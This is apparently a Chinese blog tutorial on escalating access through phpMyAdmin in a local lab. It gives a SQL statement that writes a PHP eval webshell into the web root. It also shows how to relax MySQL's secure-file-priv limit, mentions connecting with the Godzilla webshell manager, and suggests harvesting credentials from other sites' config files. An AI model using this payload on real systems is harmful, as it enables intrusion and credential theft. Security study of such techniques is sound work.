phpMyAdmin权限提升

免责声明:本文技术仅用于网络安全学习研究,请严格遵守《网络安全法》等相关法律法规,严禁未经授权对任何网络、系统实施攻击或测试,违规操作引发的一切法律责任由使用者自行承担,作者不承担连带责任。

一、环境搭建

小皮下载phpMyAdmin,绑定好网站

网站配置

对应php版本要求5.5以上,需要使用https

下载好高版本php,去网站管理这里设置

选择https,生成开发者测试证书,会自动填充,确认之后等待apache重启

用户名和密码为绑定的网站的(实战中可通过泄露得到)

登陆进去,出现报错:配置文件现在需要一个短语密码。

在下载的phpMyAdmin目录下找到文件"config.sample.inc.php"

将文件复制,重命名为"config.inc.php"

打开找到$cfg'blowfish_secret' = '';这一行,在单引号里填入任意字符串(长一些)

保存文件后刷新页面,报错解决

警告:Undefined index: utf8

还是config.inc.php文件,在数据库配置段添加字符集定义

cfg\['Servers'\]\[i]'charset' = 'utf8';

cfg\['Servers'\]\[i]'collation_connection' = 'utf8_general_ci';

二、实操

SQL命令行写入木马文件

复制代码
SELECT '<?php eval($_POST["pass"]);?>' INTO OUTFILE 'D:\\phpstudy_pro\\WWW\\1.php'

(实战中phpMyAdmin存放目录可尝试通过报错得到,\\双写防止转义)

报错,原因是 secure-file-pive是MySQL 安全限制参数,用于禁止**SELECT ... INTO OUTFILE** 随意写入服务器文件

解决:找到小皮当前使用数据库的my.ini配置文件,在mysqld写入secure-file-priv = "",保存,重启数据库

写入成功

访问1.php文件

哥斯拉连接

连接成功

横向移动的话可以去查找该数据库下其他网站配置文件等,查找源码或登录的账号密码之类的。

相关推荐
Best-Wishes10 小时前
好靶场杯第一届-古法 流量包分析
计算机网络·web安全·安全威胁分析
2601_9620725015 小时前
网络安全防护指南:筑牢网络安全防线(510)
安全·web安全·php
黄俊懿20 小时前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第八节:网关-注入攻击与预防
sql·网络安全·架构·系统架构·架构师·架构设计
黄俊懿20 小时前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第七节:网关-XSS攻击与预防
网关·网络安全·架构·系统架构·架构师·xss·架构设计
数据知道20 小时前
.NET 反序列化漏洞——ViewState 与 BinaryFormatter 实战深度剖析
网络·网络安全·.net
Bruce_Liuxiaowei1 天前
2026年8月第4周网络安全形势周报
人工智能·安全·web安全·智能体
HackTwoHub1 天前
Butter_Cookie 黄油曲奇|浏览器渗透插件,云存储检测、XSS、SQL 注入一站式 Web 安全测试工具
前端·sql·安全·web安全·网络安全·自动化·xss
Sagittarius_A*1 天前
【好靶场】报错注入-sql注入-数字型
数据库·sql·web安全·sql注入
Rain的Java大神之路1 天前
PC版网站被狂刷怎么处理
java·数据库·redis·后端·mysql·web安全·运维开发